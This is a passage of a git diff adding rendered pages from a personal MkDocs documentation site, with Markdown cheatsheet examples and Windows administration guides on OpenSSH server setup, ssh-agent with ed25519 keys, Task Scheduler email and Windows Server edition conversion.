+###### Heading 5 <small>with secondary text</small>
+
Result:
Heading 3 with secondary text Heading 4 with secondary text Heading 5 with secondary text Heading 6 with secondary text Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/code-blocks/index.html b/utilities/markdown-cheatsheet/code-blocks/index.html
new file mode 100644
index 000000000..ed299f5ad
--- /dev/null
+++ b/utilities/markdown-cheatsheet/code-blocks/index.html
@@ -0,0 +1,180 @@
+ Code Blocks - 3os markdown-cheatsheet mkdocs code-blocks Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Markdown Code Blocks Code blocks and examples are an essential part of technical project documentation. Material for MkDocs provides different ways to set up syntax highlighting for code blocks, either during build time using [Pygments] or during runtime using a JavaScript syntax highlighter.
Adding a Title In order to provide additional context, a custom title can be added to a code block by using the title="<custom title>"
option directly after the shortcode, e.g. to display the name of a file:
Example:
Code block with title ```py title="bubble_sort.py"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
bubble_sort.py def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Adding Line Numbers To Code Block Example:
Line numbers can be added to a code block by using the linenums="<start>"
option directly after the shortcode, whereas <start>
represents the starting line number. A code block can start from a line number other than 1
, which allows to split large code blocks for readability:
Code block with line numbers ```py linenums="1"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Highlighting Specific Lines Specific lines can be highlighted by passing the line numbers to the hl_lines
argument placed right after the language shortcode. Note that line counts start at 1
.
Code block with highlighted lines ```py hl_lines="2 3"
+def bubble_sort(items):
+ for i in range(len(items)):
+ for j in range(len(items) - 1 - i):
+ if items[j] > items[j + 1]:
+ items[j], items[j + 1] = items[j + 1], items[j]
+```
+
Result:
def bubble_sort ( items ):
+ for i in range ( len ( items )):
+ for j in range ( len ( items ) - 1 - i ):
+ if items [ j ] > items [ j + 1 ]:
+ items [ j ], items [ j + 1 ] = items [ j + 1 ], items [ j ]
+
Highlighting Inline Code Blocks When InlineHilite
is enabled, syntax highlighting can be applied to inline code blocks by prefixing them with a shebang, i.e. #!
, directly followed by the corresponding language shortcode
Example:
Inline code block The `#!python range()` function is used to generate a sequence of numbers.
+
Result:
The range ()
function is used to generate a sequence of numbers.
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/content-tabs/index.html b/utilities/markdown-cheatsheet/content-tabs/index.html
new file mode 100644
index 000000000..818ed7f8d
--- /dev/null
+++ b/utilities/markdown-cheatsheet/content-tabs/index.html
@@ -0,0 +1,210 @@
+ Content Tabs - 3os markdown-cheatsheet mkdocs content-tabs Authors: fire1ce | Created: 2022-04-24 | Last update: 2022-04-24 Markdown Content Tabs Sometimes, it's desirable to group alternative content under different tabs, e.g. when describing how to access an API from different languages or environments. Material for MkDocs allows for beautiful and functional tabs, grouping code blocks and other content.
Usage Grouping code blocks Code blocks are one of the primary targets to be grouped, and can be considered a special case of content tabs, as tabs with a single code block are always rendered without horizontal spacing:
Example:
Content tabs with code blocks === "C"
+
+ ``` c
+ #include <stdio.h>
+
+ int main(void) {
+ printf("Hello world!\n");
+ return 0;
+ }
+ ```
+
+=== "C++"
+
+ ``` c++
+ #include <iostream>
+
+ int main(void) {
+ std::cout << "Hello world!" << std::endl;
+ return 0;
+ }
+ ```
+
Result:
Grouping other content When a content tab contains more than one code block, it is rendered with horizontal spacing. Vertical spacing is never added, but can be achieved by nesting tabs in other blocks:
Example:
Content tabs === "Unordered list"
+
+ * Sed sagittis eleifend rutrum
+ * Donec vitae suscipit est
+ * Nulla tempor lobortis orci
+
+=== "Ordered list"
+
+ 1. Sed sagittis eleifend rutrum
+ 2. Donec vitae suscipit est
+ 3. Nulla tempor lobortis orci
+
Result:
Embedded content When [SuperFences] is enabled, content tabs can contain arbitrary nested content, including further content tabs, and can be nested in other blocks like [admonitions] or blockquotes:
Example:
Content tabs in admonition !!! example
+
+ === "Unordered List"
+
+ ``` markdown
+ * Sed sagittis eleifend rutrum
+ * Donec vitae suscipit est
+ * Nulla tempor lobortis orci
+ ```
+
+ === "Ordered List"
+
+ ``` markdown
+ 1. Sed sagittis eleifend rutrum
+ 2. Donec vitae suscipit est
+ 3. Nulla tempor lobortis orci
+ ```
+
Result:
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/diagrams/index.html b/utilities/markdown-cheatsheet/diagrams/index.html
new file mode 100644
index 000000000..62a436fe8
--- /dev/null
+++ b/utilities/markdown-cheatsheet/diagrams/index.html
@@ -0,0 +1,260 @@
+ Diagrams - 3os markdown-cheatsheet mkdocs diagram mermaid Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Mermaid Diagrams Diagrams help to communicate complex relationships and interconnections between different technical components, and are a great addition to project documentation. Material for MkDocs integrates with Mermaid.js , a very popular and flexible solution for drawing diagrams.
Usage Using Flowcharts Flowcharts are diagrams that represent workflows or processes. The steps are rendered as nodes of various kinds and are connected by edges, describing the necessary order of steps:
Flow chart ```mermaid
+graph LR
+ A[Start] --> B{Error?};
+ B -->|Yes| C[Hmm...];
+ C --> D[Debug];
+ D --> B;
+ B ---->|No| E[Yay!];
+```
+
Result:
graph LR
+ A[Start] --> B{Error?};
+ B -->|Yes| C[Hmm...];
+ C --> D[Debug];
+ D --> B;
+ B ---->|No| E[Yay!];
Using Sequence Diagrams Sequence diagrams describe a specific scenario as sequential interactions between multiple objects or actors, including the messages that are exchanged between those actors:
Sequence diagram ```mermaid
+sequenceDiagram
+ Alice->>John: Hello John, how are you?
+ loop Healthcheck
+ John->>John: Fight against hypochondria
+ end
+ Note right of John: Rational thoughts!
+ John-->>Alice: Great!
+ John->>Bob: How about you?
+ Bob-->>John: Jolly good!
+```
+
Result:
sequenceDiagram
+ Alice->>John: Hello John, how are you?
+ loop Healthcheck
+ John->>John: Fight against hypochondria
+ end
+ Note right of John: Rational thoughts!
+ John-->>Alice: Great!
+ John->>Bob: How about you?
+ Bob-->>John: Jolly good!
Using State Diagrams State diagrams are a great tool to describe the behavior of a system, decomposing it into a finite number of states, and transitions between those states:
State diagram ```mermaid
+stateDiagram-v2
+ state fork_state <<fork>>
+ [*] --> fork_state
+ fork_state --> State2
+ fork_state --> State3
+
+ state join_state <<join>>
+ State2 --> join_state
+ State3 --> join_state
+ join_state --> State4
+ State4 --> [*]
+```
+
Result:
stateDiagram-v2
+ state fork_state <<fork>>
+ [*] --> fork_state
+ fork_state --> State2
+ fork_state --> State3
+
+ state join_state <<join>>
+ State2 --> join_state
+ State3 --> join_state
+ join_state --> State4
+ State4 --> [*]
Using Class Diagrams Class diagrams are central to object oriented programing, describing the structure of a system by modelling entities as classes and relationships between them:
Class diagram ```mermaid
+classDiagram
+ Person <|-- Student
+ Person <|-- Professor
+ Person : +String name
+ Person : +String phoneNumber
+ Person : +String emailAddress
+ Person: +purchaseParkingPass()
+ Address "1" <-- "0..1" Person:lives at
+ class Student{
+ +int studentNumber
+ +int averageMark
+ +isEligibleToEnrol()
+ +getSeminarsTaken()
+ }
+ class Professor{
+ +int salary
+ }
+ class Address{
+ +String street
+ +String city
+ +String state
+ +int postalCode
+ +String country
+ -validate()
+ +outputAsLabel()
+ }
+```
+
Result:
classDiagram
+ Person <|-- Student
+ Person <|-- Professor
+ Person : +String name
+ Person : +String phoneNumber
+ Person : +String emailAddress
+ Person: +purchaseParkingPass()
+ Address "1" <-- "0..1" Person:lives at
+ class Student{
+ +int studentNumber
+ +int averageMark
+ +isEligibleToEnrol()
+ +getSeminarsTaken()
+ }
+ class Professor{
+ +int salary
+ }
+ class Address{
+ +String street
+ +String city
+ +String state
+ +int postalCode
+ +String country
+ -validate()
+ +outputAsLabel()
+ }
Using Entity-Relationship Diagrams An entity-relationship diagram is composed of entity types and specifies relationships that exist between entities. It describes inter-related things in a specific domain of knowledge:
Entity-relationship diagram ```mermaid
+erDiagram
+ CUSTOMER ||--o{ ORDER : places
+ ORDER ||--|{ LINE-ITEM : contains
+ CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
+```
+
Result:
erDiagram
+ CUSTOMER ||--o{ ORDER : places
+ ORDER ||--|{ LINE-ITEM : contains
+ CUSTOMER }|..|{ DELIVERY-ADDRESS : uses
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/external-markdown/index.html b/utilities/markdown-cheatsheet/external-markdown/index.html
new file mode 100644
index 000000000..51bd9e447
--- /dev/null
+++ b/utilities/markdown-cheatsheet/external-markdown/index.html
@@ -0,0 +1,146 @@
+ Embed External Markdown - 3os markdown-cheatsheet mkdocs external-markdown Authors: fire1ce | Created: 2022-02-26 | Last update: 2022-04-03 Embed External Markdown MkDocs Embed External Markdown plugin that allows to inject section or full markdown content from a given url. The goal is to embed different markdown from different sources inside your MkDocs project.
For more detailed inforation follow the link: Mkdocs Embed External Markdown Plugin
Usage Section defined by "##/###/####..." header (h2/h3/h4...) "#" header (h1) will be removed from source content so you can use use your own header "##/###/####..." header (h2/h3/h4...) will be removed from source section content so you can use use your own header Supports multiple sections from any source external_markdown
requires 2 parameters: url and section name .
{{ external_markdown('url', '## section name') }}
+
Full Markdown Content Embed full markdown content from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '') }}
+
Specific Section Embed markdown section from a given url, you can use the following example:
{{ external_markdown('https://raw.githubusercontent.com/fire1ce/DDNS-Cloudflare-Bash/main/README.md', '## Installation') }}
+
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/icons/index.html b/utilities/markdown-cheatsheet/icons/index.html
new file mode 100644
index 000000000..e4a593a11
--- /dev/null
+++ b/utilities/markdown-cheatsheet/icons/index.html
@@ -0,0 +1,149 @@
+ Icons & Emojis - 3os markdown-cheatsheet mkdocs icons emojis Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Icons & Emojis One of the best features of Material for MkDocs is the possibility to use more then with thousands of emojis in your project documentation with practically zero additional effort. Use Mkdocs Material Icon Search to find the icons and emojis you need.
Usage Example:
:fontawesome-regular-bell: - Fontawesome Icon: Bell
+:material-bell: - Material Icon: Bell
+:octicons-bell-24: - Octicons Icon: Bell
+:bell: - Emoji: Bell
+
Result:
- Fontawesome Icon: Bell - Material Icon: Bell - Octicons Icon: Bell - Emoji: Bell
Keyboard Keys Icons Example:
Result:
Ctrl + Alt + Del
Cmd + Ctrl + Option
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/images/index.html b/utilities/markdown-cheatsheet/images/index.html
new file mode 100644
index 000000000..05a64ed4f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/images/index.html
@@ -0,0 +1,161 @@
+ Images - 3os markdown-cheatsheet mkdocs images Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-04-03 Markdown Images Markdown is a text format so naturally you can type in the Markdown representation of an image using examples below to put an image reference directly into the editor.
Warning
This site uses the Material Design for MkDocs theme with the following CSS overrides there for the results in your case may differ.
Custom css /* images css */
+. md-typeset img {
+ border-radius : 5 px ;
+ height : auto ;
+ max-width : 95 % ;
+ margin : auto ;
+ display : block ;
+ box-shadow : rgba ( 149 , 157 , 165 , 0.2 ) 0 px 8 px 24 px ;
+}
+
Embedding Images Internal soruce example ![minion][internal-source]
+
+[internal-source ]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'
+
External source example ![minion][external-source]
+
+[external-source ]: https://octodex.github.com/images/minion.png 'Title of the image'
+
Result:
Embedding Images With Width Attributes width=200 example ![minion][internal-source]{: style="width:200px"}
+
+[internal-source ]: /assets/images/markdown-cheatsheet/minion.png 'Title of the image'
+
Result:
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/links/index.html b/utilities/markdown-cheatsheet/links/index.html
new file mode 100644
index 000000000..86821bd8f
--- /dev/null
+++ b/utilities/markdown-cheatsheet/links/index.html
@@ -0,0 +1,159 @@
+ Links - 3os markdown-cheatsheet mkdocs links Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-27 Markdown Links Link With Title Link with Title Example [My Github Page ][github-url ]
+
+[github-url ]: https://github.com/fire1ce 'Title of the link'
+
Result:
My Github Page
Open In New Tab Append (target=\_blank)
to the end of the link.
Open In New Tab Link Example [My Github Page ][github-url ]{target=\_blank}
+
+[github-url ]: https://github.com/fire1ce 'Title of the link'
+
Result:
My Github Page
Result:
Internal Anchor Links Internal Anchor Links Example [Jumps to section in page ][internal-anchor-link ]
+
+[internal-anchor-link ]: /utilities/markdown-cheatsheet/tables-lists-quotes/#lists 'Internal Anchor Links'
+
Result:
Jumps to section in page
Image With Links Image With Links Example [![This is Image with link ][image-link ]][url-link]{target=\_blank}
+
+[image-link ]: /assets/images/markdown-cheatsheet/minion200x200.png 'Minion'
+[url-link ]: https://github.com/fire1ce 'Go to Github'
+
Result:
Mailto
Link Mailto Link Example [Send Email ][mail-to-link ]
+
+[mail-to-link ]: mailto:example@example.com 'Send Email'
+
Result:
Send Email
Back to top
\ No newline at end of file
diff --git a/utilities/markdown-cheatsheet/tables-lists-quotes/index.html b/utilities/markdown-cheatsheet/tables-lists-quotes/index.html
new file mode 100644
index 000000000..82ba2275b
--- /dev/null
+++ b/utilities/markdown-cheatsheet/tables-lists-quotes/index.html
@@ -0,0 +1,188 @@
+ Tables, Lists and Quotes - 3os markdown-cheatsheet mkdocs tables lists quotes Authors: fire1ce | Created: 2022-02-20 | Last update: 2022-04-03 Tables, Lists and Quotes Tables A table in Markdown consists of two parts: the header and the rows of data in the table. As per the Markdown spec:
pipe (|) character separates the individual columns in a table. (-) hyphens act as a delimiter row to separate the header row from the body. (:) colon to align cell contents. Table Example | **Option** | **Description** |
+| ---------- | ------------------------------------------ |
+| data | path to data files to supply the data. |
+| engine | engine to be used for processing templates |
+| ext | extension to be used for dest files. |
+
Result:
Option Description data path to data files to supply the data. engine engine to be used for processing templates ext extension to be used for dest files.
Column Alignment If you want to align a specific column to the left
, center
or right
, you can use the [regular Markdown syntax] placing :
characters at the beginning and/or end of the divider.
Lists Unordered List Bullet point lists can be created by starting each line with an asterisk followed by a space before the content of the bullet point. Note that the space is important and should not be forgotten.
Example:
Unordered List Example - Lorem ipsum dolor sit amet
+- Consectetur adipiscing elit
+- Integer molestie lorem at massa
+- Facilisis in pretium nisl aliquet
+
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Facilisis in pretium nisl aliquet Ordered List Similarly, numbered lists can be created by starting each line with a number followed by a space and then the relevant text.
Ordered List Example 1. Lorem ipsum dolor sit amet
+2. Consectetur adipiscing elit
+3. Integer molestie lorem at massa
+4. Faucibus porta lacus fringilla vel
+5. Aenean sit amet erat nunc
+6. Eget porttitor lorem
+
Result:
Lorem ipsum dolor sit amet Consectetur adipiscing elit Integer molestie lorem at massa Faucibus porta lacus fringilla vel Aenean sit amet erat nunc Eget porttitor lorem Blocks List Blocks List Example > - list under lists
+> - under lists
+
Result:
list under lists under lists Tasklists A task list is a set of tasks that each render on a separate line with a clickable checkbox. You can select or deselect the checkboxes to mark the tasks as complete or incomplete.
You can use Markdown to create a task list in any comment on GitHub. If you reference an issue, pull request, or discussion in a task list, the reference will unfurl to show the title and state.
Example:
Task List Example - [x] Lorem ipsum dolor sit amet, consectetur adipiscing elit
+- [ ] Vestibulum convallis sit amet nisi a tincidunt
+ - [x] In hac habitasse platea dictumst
+ - [x] In scelerisque nibh non dolor mollis congue sed et metus
+ - [ ] Praesent sed risus massa
+- [ ] Aenean pretium efficitur erat, donec pharetra, ligula non scelerisque
+
Result:
Block Quotes For quoting blocks of content from another source within your document.
Add >
before any text you want to quote.
Quoting Blocks Example > Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.
+> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
+
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Nested Block Quotes Quoting Blocks Nested Example > Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante.
+> Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
+>
+> > Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio
+> > non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
+
Result:
Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer posuere erat a ante. Donec massa lacus, ultricies a ullamcorper in, fermentum sed augue.
Sed adipiscing elit vitae augue consectetur a gravida nunc vehicula. Donec auctorodio non est accumsan facilisis. Aliquam id turpis in dolor tincidunt mollis ac eu diam.
Back to top
\ No newline at end of file
diff --git a/utilities/useful-links-tools/index.html b/utilities/useful-links-tools/index.html
new file mode 100644
index 000000000..a2b89f8f7
--- /dev/null
+++ b/utilities/useful-links-tools/index.html
@@ -0,0 +1,167 @@
+ Useful Links & Tools - 3os utilities Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02
Back to top
\ No newline at end of file
diff --git a/utilities/wifiQrGenerator/index.html b/utilities/wifiQrGenerator/index.html
new file mode 100644
index 000000000..2f123b6c6
--- /dev/null
+++ b/utilities/wifiQrGenerator/index.html
@@ -0,0 +1,167 @@
+ Wifi QR Image Generator - 3os utilities Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Wifi QR Image Generator Description This will generate a QR code what can be used with any iOS/Android device to access a given Wifi without manually adding a network and password. Just scan the QR Code and you are connected. This is a fully static code - no data is send to any server!
Generator
Credit & Sources This code was taken from this site qistoph Github Page . It was fully reviewed for any malicious code or functionality and slightly modified to fit this site
Back to top
\ No newline at end of file
diff --git a/windows/guides/declare-locations/index.html b/windows/guides/declare-locations/index.html
new file mode 100644
index 000000000..2b236620a
--- /dev/null
+++ b/windows/guides/declare-locations/index.html
@@ -0,0 +1,171 @@
+ Declare Locations as "Inside Your Local Network" - 3os utilities network windows Authors: fire1ce | Created: 2021-09-02 | Last update: 2022-08-02 Declare Locations as "Inside Your Local Network" The Intranet Zone is the most trusted and least protected zone. DO NOT put any subnets or IP addresses in this zone unless they are TOTALLY under YOUR control. That includes ANY public server, web site, subnet, or IP address.
Select 'Control Panel'/'Internet Properties'/'Security' tab. (Alternatively, open Internet Explorer and select 'Tools'/'Internet Options'/'Security' tab.)
Highlight 'Local Intranet' and click 'Sites'.
Set the following: Uncheck 'Automatically detect intranet network'.Check 'Include all local (intranet) sites not listed in other zones'.Uncheck 'Include all sites that bypass the proxy server'.Check 'Include all network paths (UNCs)'.​
Click 'Advanced'
Uncheck 'Require server verification (https:) for all sites in this zone'.
In the field labeled 'Add this web site to the zone:', add your local, private subnet using an asterisk for a network mask and click 'Add'. E.g. If your home (local) network is 192.168.25.0 with a mask of 255.255.255.0, enter '192.168.25.*' (without the quotes).
Entries can be:​
* Individual IP addresses (e.g. '192.168.5.25', etc.),
+* Class C subnets (e.g. '192.168.27.*'),
+* Class B subnets (e.g. '172.16.*.*'), or
+* Class A subnets (e.g. '10.*.*.*')​
+
You can add as many addresses as you need to the list It can be handy add the address of a VPN subnet to the list if it is also private and you TOTALLY trust it.​
Close out with 'Close'/'OK'/'OK' and close the Control Panel (or Internet Explorer).
Back to top
\ No newline at end of file
diff --git a/windows/guides/email-from-task-scheduler/index.html b/windows/guides/email-from-task-scheduler/index.html
new file mode 100644
index 000000000..49fb122d9
--- /dev/null
+++ b/windows/guides/email-from-task-scheduler/index.html
@@ -0,0 +1,168 @@
+ Send Emails From The Windows Task Scheduler - 3os utilities windows Authors: fire1ce | Created: 2021-08-27 | Last update: 2022-08-02 Send Emails From The Windows Task Scheduler First, download SendEmail , a free (and open source) tool for sending emails from the command line. Extract the downloaded archive into a folder on your computer.
Next, launch the Windows Task Scheduler and create a new task – consult our guide to creating scheduled tasks for more information. You can create a task that automatically sends an email at a specific time or a task that sends an email in response to a specific event.
When you reach the Action window, select Start a program instead of Send an e-mail.
In the Program/script box, use the Browse button and navigate to the SendEmail.exe file on your computer.
Finally, you’ll have to add the arguments required to authenticate with your SMTP server and construct your email. Here’s a list of the options you can use with SendEmail:
Server Options -f EMAIL – The email address you’re sending from. -s SERVER:PORT – The SMTP server and port it requires. -xu USERNAME – The username you need to authenticate with the SMTP server. -xp PASSWORD – The password you need to authenticate with the SMTP server. -o tls=yes – Enables TLS encryption. May be necessary for some SMTP servers. If you’re using Gmail’s SMTP servers, these are the server options you’ll need:
Of course, you’ll have to enter your own email address and password here.
Destination Options -t EMAIL – The destination email address. You can send an email to multiple addresses by including a space between each address after the -t option. -cc EMAIL – Any addresses you’d like to CC on the email. You can specify multiple addresses by placing a space between each email address, just as with the -t command above. -bcc EMAIL – The BCC version of the CC option above. Email Options -u SUBJECT – The subject of your email -m BODY – The message body text of your email. -a ATTACHMENT – The path of a file you’d like to attach. This is optional. For example, let’s say your email address is example@gmail.com and you’d like to send an email to person@example.com
. You’d use the following options:
-f example@gmail.com -t person@example.com -u Subject -m This is the body text! -s smtp.gmail.com:587 -xu example@gmail.com -xp password -o tls=yes
+
Once you’ve put together your options, copy and paste them into the Add arguments box.
Save your task and you’re done. Your task will automatically send email on the schedule (or in response to the event) you specified.
Back to top
\ No newline at end of file
diff --git a/windows/ssh-server/index.html b/windows/ssh-server/index.html
new file mode 100644
index 000000000..c8124f625
--- /dev/null
+++ b/windows/ssh-server/index.html
@@ -0,0 +1,179 @@
+ Windows SSH Server - 3os windows ssh-server powershell rsa-keys Authors: fire1ce | Created: 2022-04-21 | Last update: 2022-04-21 Windows SSH Server Sometime you need to connect to a remote server via SSH
. Usually it's the main connection to linux servers. But you can also connect to a windows server via SSH
. At this guide we will show you how to install and configure a windows ssh server, including SSH Keys authentication
.
SSH Server Installation on Windows We will be using PowerShell to install the SSH server inculding the SSH client.
Open PowerShell Terminal as Administrator.
Run the following commands to install the SSH server and client.
Add-WindowsCapability -Online -Name OpenSSH . Client ~~~~ 0 . 0 . 1 . 0
+Add-WindowsCapability -Online -Name OpenSSH . Server ~~~~ 0 . 0 . 1 . 0
+
After the installaton you can check the Windows SSH server and client are installed.
Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'
+
The output will be something like this:
To start the Windows SSH server service
Enable Windows SSH Server on Windows Boot
Set-Service -Name sshd -StartupType 'Automatic'
+
Add a Firewall rule to allow the SSH port
if (!( Get-NetFirewallRule -Name "OpenSSH-Server-In-TCP" -ErrorAction SilentlyContinue | Select-Object Name , Enabled )) { Write-Output "Firewall Rule 'OpenSSH-Server-In-TCP' does not exist, creating it..." New-NetFirewallRule -Name 'OpenSSH-Server-In-TCP' -DisplayName 'OpenSSH Server (sshd)' -Enabled True -Direction Inbound -Protocol TCP -Action Allow -LocalPort 22 } else { Write-Output "Firewall rule 'OpenSSH-Server-In-TCP' has been created and exists." }
+
At this point you should be able to connect via SSH to the Windows server with your username and password.
Adding SSH Keys Administrator User Create the file: administrators_authorized_keys
at the following location:
C:\ProgramData\ssh\administrators_authorized_keys
+
Edit the file and add you SSH public key to the file.
Now we need to import the SSH public key to the Windows SSH server. We can do this by using the following command:
icacls . exe "C:\ProgramData\ssh\administrators_authorized_keys" / inheritance : r / grant "Administrators:F" / grant "SYSTEM:F"
+
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect to the Windows server with your SSH key
Regular User (non-administrator) Create a .ssh
directory in the home directory of the user.
```path
+C:\Users\<username>\.ssh\
+
Create the file: authorized_keys
at the following location:
C:\Users\<username>\.ssh\authorized_keys
+
Edit the file and add you SSH public key to the file.
Test the SSH connection to the Windows server from remote machine with the SSH Key. You should be able to connect with non-administrator user to the Windows server with your SSH key
PowerShell
as Default Shell for SSH By default the SSH client uses the Windows command prompt as the default shell.
We can change the default shell to PowerShell running the following PowerShell command:
New-ItemProperty -Path "HKLM:\SOFTWARE\OpenSSH" -Name DefaultShell -Value "C:\Windows\System32\WindowsPowerShell\v1.0\PowerShell.exe" -PropertyType String -Force
+
Next to you connet to the Windows SSG server it should start the PowerShell shell.
It should look something like this:
Back to top
\ No newline at end of file
diff --git a/windows/useful-software/index.html b/windows/useful-software/index.html
new file mode 100644
index 000000000..758774b77
--- /dev/null
+++ b/windows/useful-software/index.html
@@ -0,0 +1,167 @@
+ Useful Software - 3os
\ No newline at end of file
diff --git a/windows/windows-servers/index.html b/windows/windows-servers/index.html
new file mode 100644
index 000000000..d341d89cd
--- /dev/null
+++ b/windows/windows-servers/index.html
@@ -0,0 +1,171 @@
+ Windows Servers - 3os utilities windows servers Authors: fire1ce | Created: 2021-12-02 | Last update: 2022-08-02 Windows Servers Basic Setup At Server Manager click Configure this local server
Computer name - rename the server's name Remote Desktop - allow RDP Ethernet instance - disable IPV6 Feedback & Diagnostics - set Feedback frequency
to Never
IE Enhanced Security Configuration - Off Time zone - set the current timezone, At Internet Time
tab chanche time.windwos.com
to time.nist.gov
Open gpedit.msc with Run
Local Computer Policy -> Administrative Templates -> System -> Display Shutdown Even Tracker - Disable Local Computer Policy -> Windows Settings -> Security Settings -> Local Policies -> Security Options ->Interactive logon: Do not require CTRL+ALT+DEL - Enable Convert Evaluation Copy to Full Version When using the Evaluation version of Windows Server, the desktop displays the current build and the time until the end of the grace period (Windows License valid for 180 days).
Windows Server 2022 Run from Powershell:
Windows Server 2022 Standard
dism / online / set-edition : serverstandard / productkey : VDYBN - 27WPP-V4HQT - 9VMD4-VMK7H / accepteula
+
Windows Server 2022 Datacenter:
dism / online / set-edition : serverdatacenter / productkey : WX4NM-KYWYW-QJJR4-XV3QB - 6VM33 / accepteula
+
Windows Server 2019 Run from Powershell:
Windows Server 2019 Standard
dism / online / set-edition : ServerStandard / productkey : N69G4-B89J2 - 4G8F4-WWYCC-J464C / accepteula
+
Windows Server 2019 Datacenter:
dism / online / set-edition : ServerDatacenter / productkey : WMDGN-G9PQG-XVVXX-R3X43 - 63DFG / accepteula
+
Back to top
\ No newline at end of file
diff --git a/windows/windows-ssh-agent-with-keys/index.html b/windows/windows-ssh-agent-with-keys/index.html
new file mode 100644
index 000000000..a37222394
--- /dev/null
+++ b/windows/windows-ssh-agent-with-keys/index.html
@@ -0,0 +1,187 @@
+ Windows SSH with ed25519 Keys - 3os SSH Windows ed25519 OpenSSH Git Security Authors: fire1ce | Created: 2023-07-05 | Last update: 2023-07-05 Windows SSH Client with ed25519 Keys for Secure Connections In the modern digital age, ensuring the security of your connections is critical. This guide will walk you through the steps to configure the SSH client and SSH agent on Windows using ed25519 keys, allowing for secure connections to services like Git and remote servers.
Introduction to SSH and ed25519 Keys SSH, or Secure Shell, is a cryptographic network protocol for secure communication over an unsecured network. It is particularly used for secure logins, file transfers, and command-line operations.
ed25519 is a public-key signature system that is renowned for high security with relatively short key lengths. This makes it faster and more efficient compared to older algorithms such as RSA.
OpenSSH Client Installation To utilize SSH, you need to ensure that the OpenSSH client is installed on your Windows system.
Note
The above below should be performed in PowerShell with Administrator privileges.
Check if OpenSSH Client is available by running the following cmdlet: Get-WindowsCapability -Online | Where-Object Name -like 'OpenSSH*'
+
If OpenSSH Client is not installed, the output will be:
Name: OpenSSH.Client~~~~0.0.1.0
+State: NotPresent
+
If it's not present, proceed to the next step to install it.
Install the OpenSSH Client by running the following command: # Install the OpenSSH Client
+Add-WindowsCapability -Online -Name OpenSSH . Client ~~~~ 0 . 0 . 1 . 0
+
The command should return:
Path:
+Online: True
+RestartNeeded: False
+
Setting Up SSH Agent in Windows The SSH Agent is a background service that stores your keys. When connecting to a remote host using SSH, the agent can automatically provide the key.
Note
The above below should be performed in PowerShell with Administrator privileges.
Set SSH Agent to start automatically at boot : Set-Service -Name ssh-agent -StartupType 'Automatic'
+
Start the SSH Agent service : Start-Service -Name ssh-agent
+
Test the SSH Agent Is Running : Get-Service -Name ssh-agent
+
The output should be:
Status Name DisplayName
+------ ---- -----------
+Running ssh-agent OpenSSH Authentication Agent
+
Generating and Adding ed25519 SSH Keys Note
The above below should be performed in PowerShell with regular user privileges.
Generate ed25519 SSH keys : ssh-keygen -t ed25519 -C "your_email@example.com"
+
This command generates an ed25519 key pair. The default location for the keys is C:\Users\<YourUsername>\.ssh
. The private key is named id_ed25519
and the public key is named id_ed25519.pub
.
Adding the ed25519 SSH Key to the SSH Agent : ssh-add $env :USERPROFILE\. ssh\i d_ed25519
+
If your keys are stored in a different location or have a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\p ath\t o\y our\p rivate-key-file
+
Importing Existing ed25519 SSH Keys (Optional) If you already have an existing pair of ed25519 SSH keys that you would like to use, you can import them into your SSH Agent.
Note
The above below should be performed in PowerShell with regular user privileges.
Copy your existing private key to the default SSH folder . The default folder for SSH keys is typically C:\Users\<YourUsername>\.ssh
. Make sure the private key file you are copying is named id_ed25519
.
Add the existing ed25519 SSH Key to the SSH Agent :
ssh-add $env :USERPROFILE\. ssh\i d_ed25519
+
Note: If your private key file is located in a different path or has a different name, you can specify the full path to the key file as an argument to ssh-add
. For example:
ssh-add C:\p ath\t o\y our\p rivate-key-file
+
Copy your existing public key to the servers or services you want to connect to. This typically involves appending the contents of your public key file to the ~/.ssh/authorized_keys
